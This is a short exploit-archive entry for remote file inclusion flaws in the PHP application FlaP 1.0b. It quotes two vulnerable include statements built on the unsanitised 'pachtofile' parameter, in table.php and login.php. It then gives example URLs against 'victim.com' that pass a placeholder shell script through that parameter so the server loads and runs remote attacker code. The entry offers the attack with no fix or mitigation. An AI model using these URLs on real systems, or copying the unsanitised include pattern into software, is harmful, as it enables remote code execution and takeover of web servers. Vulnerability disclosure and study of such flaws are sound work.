FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities

2007-05-25T00:00:00
ID 1337DAY-ID-1912
Type zdt
Reporter xoron
Modified 2007-05-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities
============================================================



##############################################################################################
# FlaP v.1.0. Beta  <=  Remote File Inclusion Vulnerability                                  #
#                                                                                            #

#                                                                                            #
##############################################################################################
#Vuln Code                                                                                   #  

#                                                                                            # 
#ERROR1:skin/html/table.php                                                                  # 
#                                                                                            # 

# <? include "$pachtofile/left_menu.php"; <<< RFI CODE                                       # 
#                                                                                            # 

#                                                                                            # 
#BUG1:                                                                                       # 
#                                                                                            # 

#Example1:http://victim.com/path/skin/html/table.php?pachtofile=[[Sh3LL Script]]             #
##############################################################################################

#                                                                                            # 
#ERROR2:login.php                                                                            # 
#                                                                                            # 

#<? include "$pachtofile/right_menu.php"; ?></ <<< RFI CODE                                  #
#                                                                                            # 

#                                                                                            # 
#BUG2:                                                                                       # 
#                                                                                            # 

#Example1:http://victim.com/path/login.php?pachtofile=[[Sh3LL Script]]                       #
##############################################################################################


##############################################################################################
#                                                                                            # 
#Cyber-Security                                                                              # 
#                                                                                            # 
##############################################################################################




#  0day.today [2018-04-09]  #